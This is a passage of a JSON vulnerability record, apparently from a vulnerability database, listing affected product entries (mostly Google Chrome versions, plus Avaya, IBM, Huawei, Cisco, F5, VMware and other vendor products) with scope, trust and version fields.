"vendor": "google", "version": "32.0.1654.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.112" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "oceanstor s5800t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "t410 all-in-one rfx/hdx smart zc", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "18.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.15" }, { "model": "webex node", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.493.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.103" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.327" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.186" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.10" }, { "model": "ipso ngx r65", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.956.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.217" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491036" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.108" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.7" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system storage san768b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-384" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.522.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.38" }, { "model": "data center analytics framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.94" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.30" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.1" }, { "model": "fusioncompute v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storeall os", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.5.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.159" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "mirage gateway", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.152.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.556.0" }, { "model": "oceanstor vtl3500 v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.53" }, { "model": "identity engines ignition server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.161" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.772.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1059.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.29" }, { "model": "ipso r70", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.398.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.140" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.53" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.321" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.870.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1006.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.91" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.14127" }, { "model": "secure access remote access concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1653.1" }, { "model": "virtualization experience client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "62150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1083.0" }, { "model": "nexus virtual supervisor module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.301" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.335" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.695.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1021" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.325" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.732.0" }, { "model": "video distribution suite for internet streaming vds-is", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1290.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.26" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.712.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.558.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.822.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.120" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.665.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.629.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "bash shell for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.14.8" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.13974" }, { "model": "oceanstor s5800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.0" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.339" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.763.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.947.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.168" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.878.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.542.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.48" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.837.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1014" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.43" }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "high-density server xh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.929.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.324" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.510.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.1549" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.410.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.787.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.323" }, { "model": "oceanstor 9000e v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.82" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.405.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.796.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.153.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.4" }, { "model": "enterprise linux long life server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.6" }, { "model": "ios-xe for catalyst 3k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.123" }, { "model": "gaia embedded r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7830" }, { "model": "system networking san96b-5 2498-f96", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.103" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.757.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.40" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8900" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.832.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1066.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.50" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.316" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.1" }, { "model": "rack server rh5885h v100r003c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.221.8" }, { "model": "ipso r75.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.403.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.0" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1018.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1278.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.229" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.146" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.139" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1282.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.303.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.4" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "gaia embedded r71.10", 